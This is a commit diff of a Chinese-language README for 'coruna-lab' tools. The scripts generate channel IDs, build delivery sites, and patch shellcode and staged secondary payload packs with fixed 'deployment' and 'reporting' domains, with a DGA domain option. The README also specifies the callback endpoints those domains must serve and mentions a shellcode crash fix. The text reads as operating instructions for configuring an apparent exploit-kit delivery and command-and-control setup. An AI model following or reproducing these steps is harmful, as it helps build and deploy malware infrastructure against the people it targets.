feature
This commit is contained in:
+30
-44
@@ -1,76 +1,67 @@
|
||||
# coruna-lab 工具:channel id / 固定域名
|
||||
|
||||
## 推荐:`new_project.py`(新 channel + 固定域名)
|
||||
## 推荐:`new_project.py`
|
||||
|
||||
每次运行都会:
|
||||
从 **Laravel 配置**读取投放域名(系统设置 → 投放域名,或 `.env` `CORUNA_CHANNEL_DOMAINS`),行为:
|
||||
|
||||
1. 自动生成 **32 hex** channel id(或 `--channel-id`)
|
||||
1. 生成或使用 **32 位小写 `[0-9a-z]`** channel id
|
||||
2. 从 `source/web/<原channel>/` 复制出 `server/public/web/<新channel>/`
|
||||
3. 从 `source/sync` 重置并重建 `sync/`(固定域名写入 core / `daily.html`)
|
||||
4. 写入固定域名 + channel,重打包全部 type0x01 二级包
|
||||
3. **域名与上次 `out/domains.json` 相同**(且已有 `sync/`)→ 只打 secondary,**不碰 sync**
|
||||
4. **域名变更 / 首次无 sync** → 从 `source/sync` 重置并 `patch_all` 重建 sync
|
||||
|
||||
**无 reuse-sync / 无改 seed 参数。** seed 由域名列表确定性推导;`daily.html`/`erupt_flee.js` 经内容缓存消除 py7zr 随机 salt,相同域名多次构建 → `sync/` 字节一致,仅 `web/<channel>/` 因 channel 不同。旧版备份:`tools/new_project.py.bak`。
|
||||
后台「新建渠道链接」会带上当前配置域名调用本脚本。
|
||||
|
||||
```bash
|
||||
cd coruna-lab
|
||||
# 需 py7zr + pycryptodome(macOS 可用 /usr/bin/python3;Homebrew python 建议 venv)
|
||||
pip3 install py7zr pycryptodome
|
||||
|
||||
/usr/bin/python3 tools/new_project.py \
|
||||
--deployment-domains 'www.dep1.example,www.dep2.example' \
|
||||
--reporting-domains 'www.rep1.example,www.rep2.example'
|
||||
```
|
||||
# 域名默认读 Laravel 配置
|
||||
/usr/bin/python3 tools/new_project.py --channel-id 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
|
||||
|
||||
也支持重复传参 / 指定 channel:
|
||||
|
||||
```bash
|
||||
# 也可显式覆盖
|
||||
/usr/bin/python3 tools/new_project.py \
|
||||
--channel-id 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' \
|
||||
--deployment-domains www.dep1.example \
|
||||
--deployment-domains www.dep2.example \
|
||||
--reporting-domains www.rep1.example \
|
||||
--reporting-domains www.rep2.example
|
||||
--deployment-domains 'www.dep1.example,www.dep2.example' \
|
||||
--reporting-domains 'www.rep1.example,www.rep2.example'
|
||||
|
||||
# 强制重建 sync
|
||||
/usr/bin/python3 tools/new_project.py --channel-id '...' --force-sync
|
||||
```
|
||||
|
||||
产物(写入 `server/public/`):
|
||||
产物:
|
||||
|
||||
- `server/public/web/<channel-id>/` — 投递站(可并存多个 channel)
|
||||
- `server/public/sync/` — 每次重建(同域名则内容一致)
|
||||
- `server/public/out/channel.json` — 本次 channel
|
||||
- `server/public/out/domains.json` — 固定域名列表
|
||||
- `server/public/out/seeds.json` — 由域名推导的内部 seed
|
||||
- `server/public/out/sync/MANIFEST.json` — core sha/size + domains
|
||||
- `server/public/web/<channel-id>/` — 投递站
|
||||
- `server/public/sync/` — 仅域名变化时重建
|
||||
- `server/public/out/{channel,domains,seeds}.json`
|
||||
|
||||
约束:
|
||||
|
||||
- channel id:**恰好 32** 个小写十六进制字符(与 type-0x01 C 字符串槽位同宽)
|
||||
- channel id:恰好 **32** 个小写字母数字
|
||||
- 每池最多 **8** 个域名,单域名 ≤ 63 ASCII
|
||||
- 可写 `https://host`(会自动去掉 scheme/path/port)
|
||||
- 部署后把这些域名 DNS/hosts 指到你的 lab server(443)
|
||||
- Deployment 需响应 `/sync/daily.html`;Reporting 需 `/api/user/query` → `OK`
|
||||
- `daily.html` 打到 **Deployment 域名**(不是投递站 `/web/...`);type-0x01 起来后才会请求
|
||||
- 固定域名 shellcode 曾有 callee-saved 寄存器未保存的 bug(会在探测前崩);请用当前 `tools/_domain_patch.py` 重新生成后再部署
|
||||
- macOS 建议用 `/usr/bin/python3`(需 `py7zr` + `pycryptodome`);Homebrew 3.14 常缺 `Crypto`
|
||||
- macOS 建议 `/usr/bin/python3`(需 `py7zr` + `pycryptodome`)
|
||||
|
||||
查看当前配置域名:
|
||||
|
||||
```bash
|
||||
cd server && php artisan coruna:channel-domains --json
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 仅重建(已有 server/public)
|
||||
|
||||
```bash
|
||||
# 自动生成 channel;若尚无 web/<channel>/ + sync/,会从 source/ 复制
|
||||
/usr/bin/python3 tools/patch_all.py --apply --root server/public \
|
||||
--channel-id 'dddddddddddddddddddddddddddddddd' \
|
||||
--deployment-domains 'www.dep1.example,www.dep2.example' \
|
||||
--reporting-domains 'www.rep1.example,www.rep2.example'
|
||||
```
|
||||
|
||||
域名未变、只要新 channel 时用 `new_project.py`(会复用 `out/seeds.json` + 现有 `sync/`)。
|
||||
|
||||
### Seed 格式
|
||||
|
||||
- ASCII,长度 ≤ 32(二进制槽位定长 32)
|
||||
- 推荐正好 32 个十六进制字符
|
||||
- Deployment / Reporting 各一个;域名未变时 `new_project` 会自动复用上次 seed
|
||||
- 域名未变时 `new_project` 会复用 `out/seeds.json`
|
||||
|
||||
---
|
||||
|
||||
@@ -80,19 +71,14 @@ pip3 install py7zr pycryptodome
|
||||
# 二级包 type0x01(含 channel)
|
||||
/usr/bin/python3 tools/patch_secondary_packs.py \
|
||||
--deployment-seed <32hex> --reporting-seed <32hex> \
|
||||
--channel-id <32hex> \
|
||||
--channel-id <id> \
|
||||
--deployment-domains 'a.com,b.com' --reporting-domains 'c.com,d.com' \
|
||||
--root server/public --apply
|
||||
|
||||
# core + daily 校验
|
||||
# core + sync 业务插件 + daily
|
||||
/usr/bin/python3 tools/patch_core.py \
|
||||
--deployment-seed <32hex> --reporting-seed <32hex> \
|
||||
--channel-id <id> \
|
||||
--deployment-domains 'a.com,b.com' --reporting-domains 'c.com,d.com' \
|
||||
--root server/public --apply
|
||||
|
||||
# 只算 DGA 域名(固定域名模式不需要)
|
||||
/usr/bin/python3 tools/compute_dga_domains.py \
|
||||
--deployment-seed <32hex> --reporting-seed <32hex> -n 5
|
||||
```
|
||||
|
||||
源 dylib 仍读自 `coruna-online/`;`--apply` 写入 `server/public/web/<channel>/` + `sync/`(不会写 `source/`)。
|
||||
|
||||
Reference in New Issue
Block a user